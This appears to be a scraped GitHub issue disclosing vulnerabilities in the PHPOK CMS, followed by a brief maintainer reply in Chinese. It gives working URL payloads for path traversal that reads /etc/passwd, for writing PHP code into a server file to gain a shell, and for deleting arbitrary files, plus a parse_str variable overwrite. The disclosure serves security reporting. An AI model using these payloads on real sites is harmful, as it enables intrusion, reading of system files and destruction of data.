We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
from the Entrance of framework,i discovered parse_str variable overwrite in framework/init.php
parse_str
framework/init.php
we could watch $query_string parameter in framework/libs/server.php :
$query_string
framework/libs/server.php
payload:http://phpok/?data[script]=passer6y
http://phpok/?data[script]=passer6y
back to the: framework/admin/tpl_control.php
framework/admin/appsys_control.php
there is two file have this vulnerability: payload1:
/admin.php?c=appsys&f=file_edit&id=fav&title=../../../../../../../etc/passwd
payload2:
/admin.php?c=tpl&f=edit&id=1&title=../../../../../../../etc/passwd
edit_save_f() function In framework/admin/tpl_control.php 383 line
edit_save_f()
framework/admin/tpl_control.php
payload:/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
framework/admin/tpl_control.php 303行 delfile_f()函数:
delfile_f()
payload: /admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php
/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php
The text was updated successfully, but these errors were encountered:
感谢您如此仔细的测评! 这里我们先说明一下,后台针对已经登录的管理员(目前是系统管理员)是有最高权限的! 回头我们会针对普通管理员进行一定的限制,感谢您的支持
Sorry, something went wrong.
No branches or pull requests
Variable Overwrite Vulnerability
from the Entrance of framework,i discovered
parse_str
variable overwrite inframework/init.php
we could watch
$query_string
parameter inframework/libs/server.php
:payload:
http://phpok/?data[script]=passer6y
Vulnerability to read arbitrary files
back to the:
framework/admin/tpl_control.php
framework/admin/appsys_control.php
there is two file have this vulnerability:
payload1:
payload2:
Arbitrary File Writing to getshell
edit_save_f()
function Inframework/admin/tpl_control.php
383 linepayload:
/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
Arbitrary file delete Vulnerability
framework/admin/tpl_control.php 303行
delfile_f()
函数:payload:
/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php
The text was updated successfully, but these errors were encountered: